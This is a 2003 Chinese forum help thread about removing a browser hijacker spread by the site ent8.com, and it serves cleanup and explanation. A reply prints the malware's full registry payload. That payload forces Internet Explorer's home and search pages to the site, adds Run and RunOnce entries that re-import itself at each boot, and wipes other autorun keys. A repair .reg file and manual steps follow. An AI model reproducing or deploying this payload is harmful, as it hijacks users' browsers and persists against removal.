|
論壇說明 |
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
主題工具 | 顯示模式 |
2003-10-30, 05:30 PM | #1 |
榮譽會員
|
被惡意網站改了預設頁 清理註冊表也不行
Q:
www.ent8.com 又是這個網站啊,我現在還沒有搞定它啊,樓上的,有沒有什麼解決的方法??我試過執行msconfig看過了,沒有啟動它,但是把它從註冊表裡刪除了,然後利用最佳化大師修改過了,重開機之後還是有這個東西,請問要怎麼辦呢?? 瀏覽該網站,會產生C:\$NtUninstallQ887678$目錄,該目錄屬於」受保護的操作系統檔案「,所以檔案總管預設的是不顯示它。 關於目錄下的文件,不是很懂證書和VBS這一塊,希望懂的看看。 這個網站很爛的...中過招 A: 上他的網頁試試!! 以我的電腦裝了江民殺毒王,預設主頁沒被改:) 在瀏覽該主頁時說是發現了病毒,並已清除。 但在C碟下有C:\$NtUninstallQ887678$這個目錄,採用一平兄所述方面也刪除該目錄,也未能成功:(~~~ 提示說:該檔案可能在使用,不能刪除! 問題解決了! C:\$NtUninstallQ887678$目錄下有兩個文件,一個WINSYS.cer,一個WINSYS.vbs。其實這兩個都是文本文件,第一個WINSYS.cer所謂的證書文件其實是假的。 它會在註冊表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 以及 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 兩個位置產生如下鍵值: regedit -s C:\$NtUninstallQ887678$\WINSYS.cer 從而在每次啟動Windows的時候把下列內容匯入註冊表。 只是未明白最後為什麼又要把那麼多子鍵刪除了。 「只許州官放火,不許百姓點燈?」 把其他家的惡意程式碼都刪除了? [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer] "SearchURL"="http://www.ent8.com/" [HKEY_USERS\.Default\Software\Microsoft\Internet Explorer] "SearchURL"="http://www.ent8.com/" [HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main] "Search Page"="http://www.ent8.com/" "Default_Search_URL"="http://www.ent8.com/" "Search Bar"="http://www.ent8.com/" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search] "SearchAssistant"="http://www.ent8.com/" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search] "SearchAssistant"="http://www.ent8.com/" [HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search] "SearchAssistant"="http://www.ent8.com/" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] "Start Page"="http://www.ent8.com/" "First Home Page"="http://www.ent8.com/" "Default_Search_URL"="http://www.ent8.com/" "Search Page"="http://www.ent8.com/" "Search Bar"="http://www.ent8.com/" "Local Page"="http://www.ent8.com/" [-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run] [HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run] @="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] "Default_Page_URL"="http://www.ent8.com/" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Default_Search_URL"="http://www.ent8.com/" "Search Page"="http://www.ent8.com/" "Search Bar"="http://www.ent8.com/" "SearchURL"="http://www.ent8.com/" "Start Page"="http://www.ent8.com/" "First Home Page"="http://www.ent8.com/" "Default_Page_URL"="http://www.ent8.com/" "Local Page"="http://www.ent8.com/" [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] "WlN32"="C:\\$NtUninstallQ887678$\\WINSYS.vbs" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "WlN32"="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer" "internat.exe"="internat.exe" "zwupdows"=- "win"=- "mwin"=- "intenet"=- "Inernet"=- "Internet"=- "iexpleror"=- "zxdows"=- "qwe"=- "win1"=- "winwin"=- "9i5zxdows"=- "9i5com01zxdows"=- "99zxdows"=- "syste"=- "intelnat.exe"=- "88zxdows"=- "Start Pagewin"=- "Start Page"=- "9i5comzxdows"=- "9q5zxdows"=- "999izxdows"=- "033zxdows"=- "8zxdows"=- "flash"=- "3zxdows"=- "interneet.exe"=- "u88y"=- "88u88"=- "u18"=- "u1881"=- "u1882"=- "u1883"=- "u1884"=- "u1885"=- "u1886"=- "u1887"=- "u1888"=- "system"=- "u188"=- "iexpler"=- "u1810"=- "WIN32"=- 使用這個如下面的注冊檔,就可恢復。 還有,就是 C:\windows\win.ini 這個文件,也要檢查一下,具體做了什麼,沒有查出來,因為我的是2k系統。 REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer] "SearchURL"="about:blank" [HKEY_USERS\.Default\Software\Microsoft\Internet Explorer] "SearchURL"="about:blank" [HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main] "Search Page"="about:blank" "Default_Search_URL"="about:blank" "Search Bar"="about:blank" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search] "SearchAssistant"="about:blank" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search] "SearchAssistant"="about:blank" [HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search] "SearchAssistant"="about:blank" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] "Start Page"="about:blank" "First Home Page"="about:blank" "Default_Search_URL"="about:blank" "Search Page"="about:blank" "Search Bar"="about:blank" "Local Page"="about:blank" [HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run] @="" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] "Default_Page_URL"="about:blank" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Default_Search_URL"="about:blank" "Search Page"="about:blank" "Search Bar"="about:blank" "SearchURL"="about:blank" "Start Page"="about:blank" "First Home Page"="about:blank" "Default_Page_URL"="about:blank" "Local Page"="about:blank" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] "WlN32"=- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "WlN32"=- 另外!解決的方法還有一個: 1、上http://www.duba.net/download/3/8.shtml,下載註冊表修復工具。 2、根據下圖設定檔案總管內容。自然就可以在C碟看到一個C:\$NtUninstallQ887678$目錄了。 刪除它。 3、執行msconfig.sys,在啟動項找到regedit -s C:\$NtUninstallQ887678$\WINSYS.cer 把前面的勾取消。 4、執行金山毒霸的註冊表修復工具。把IE的預設主頁等該死的地方都修復了。 5、重啟,檢驗戰果。 |
送花文章: 3,
|